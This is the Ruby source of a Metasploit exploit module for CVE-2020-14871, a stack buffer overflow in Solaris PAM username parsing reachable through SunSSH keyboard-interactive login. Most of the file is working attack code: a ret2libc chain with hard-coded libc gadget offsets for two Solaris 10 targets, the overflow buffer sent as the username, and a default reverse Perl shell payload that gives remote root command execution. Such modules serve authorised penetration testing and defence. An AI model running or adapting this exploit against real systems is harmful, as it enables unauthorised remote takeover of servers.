GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/solaris/ssh/pam_username_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  # AutoCheck is prepended so #check runs ahead of #exploit; CheckModule
  # delegates #check to the auxiliary module named by the 'CheckModule'
  # default option below (auxiliary/scanner/ssh/ssh_version).
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::CheckModule
  include Msf::Exploit::Remote::SSH

  # Module metadata. Both targets advertise the same 'Ident' banner and differ
  # only in 'LibcBase', so #check cannot tell them apart: a wrong target choice
  # shows up as a disconnect in #exploit rather than as a Safe check result.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in the Solaris PAM
          library's username parsing code, as used by the SunSSH daemon when the
          keyboard-interactive authentication method is specified.

          Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox,
          VMware Fusion, and VMware Player. Bare metal untested. Your addresses
          may vary.
        },
        'Author' => [
          'Jacob Thompson', # Analysis
          'Aaron Carreras', # Analysis
          'Jeffrey Martin', # Testing
          'Hacker Fantastic', # PoC
          'wvu' # Exploit
        ],
        'References' => [
          ['CVE', '2020-14871'],
          ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html'],
          ['URL', 'https://hacker.house/lab/cve-2020-18471/'],
          ['URL', 'https://twitter.com/hackerfantastic/status/1323431512822435841']
        ],
        'DisclosureDate' => '2020-10-20', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => true,
        'Payload' => {
          # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617
          # NUL, tab and space must not appear in the encoded command.
          'BadChars' => "\x00\x09\x20",
          'Encoder' => 'cmd/perl'
        },
        'Targets' => [
          [
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware',
            {
              'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',
              'LibcBase' => 0xfeb90000
            }
          ],
          [
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox',
            {
              'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',
              'LibcBase' => 0xfeb80000
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_perl',
          'SSH_TIMEOUT' => 2,
          'CheckModule' => 'auxiliary/scanner/ssh/ssh_version'
        },
        # Declared operator-facing side effects: a crashed daemon restarts,
        # failed attempts can lock accounts and leave log entries.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ACCOUNT_LOCKOUTS, IOC_IN_LOGS]
        }
      )
    )
  end

  # Delegates to auxiliary/scanner/ssh/ssh_version and compares the banner it
  # reports (details[:ident]) with the selected target's 'Ident'.
  #
  # Returns the scanner's own result unless it was Detected; Safe when the
  # banner does not match the target; Appears when it does. Appears rather
  # than Vulnerable because only the version banner is compared, which does
  # not show whether a fix has been applied.
  def check
    # Run auxiliary/scanner/ssh/ssh_version
    checkcode = super

    return checkcode unless checkcode == CheckCode::Detected

    unless target['Ident'] == checkcode.details[:ident]
      return CheckCode::Safe("#{target.name} is an incompatible target.")
    end

    CheckCode::Appears("#{target.name} is a compatible target.")
  end

  # Opens a single SSH connection using keyboard-interactive auth and an empty
  # initial username; the buffer from #ret2libc is passed as the :password
  # option (see the HACK note). The outcome is inferred solely from which
  # Net::SSH exception is raised, handled by the method-level rescue clauses.
  def exploit
    print_status("Exploiting #{target.name}")

    ssh_client_opts = ssh_client_defaults.merge(
      port: rport,
      auth_methods: ['keyboard-interactive'],
      password: ret2libc, # HACK: This is really the username prompt on Solaris
      timeout: datastore['SSH_TIMEOUT']
    )

    ssh_client_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    print_status("Yeeting #{datastore['PAYLOAD']} at #{peer}")

    # Empty initial username
    Net::SSH.start(rhost, '', ssh_client_opts)
  rescue Net::SSH::AuthenticationFailed
    # The daemon processed the attempt as an ordinary failed login; reported
    # with the standard Safe message.
    print_error(CheckCode::Safe.message)
  rescue Net::SSH::Disconnect
    # Connection dropped; both targets share an Ident, so this is the only
    # signal that the chosen 'LibcBase' may be the wrong one.
    print_warning('Disconnected, target selection may be incorrect!')
  rescue Net::SSH::ConnectionTimeout
    # Do nothing on success
    # NOTE(review): a timeout is treated as success here; presumably the
    # reverse payload establishes the session on its own - confirm.
  end

  # XXX: No ASLR, but NX stack and libc base changes...
  #
  # Builds the overflow string: 516 random bytes up to the saved return
  # address, then a fixed sequence of libc-relative gadget addresses (only
  # target['LibcBase'] varies between targets), ending with the encoded
  # payload. Returns buf (String#<< returns its receiver).
  def ret2libc
    buf = rand_text(516) # Offset to saved EIP
    buf << p32(target['LibcBase'] + 0x23904) # add esp, 8; ret
    buf << rand_text(4) # Padding
    buf << p32(0x08040101) # ecx
    buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret
    buf << p32(target['LibcBase'] + 0x256d0) # exit(3)
    buf << p32(target['LibcBase'] + 0x91edf) # system(3)
    buf << rand_text(4) # Padding
    buf << p32(target['LibcBase'] + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret
    buf << payload.encoded
  end

  # Packs addr as a 32-bit little-endian unsigned integer ('V').
  def p32(addr)
    [addr].pack('V')
  end

end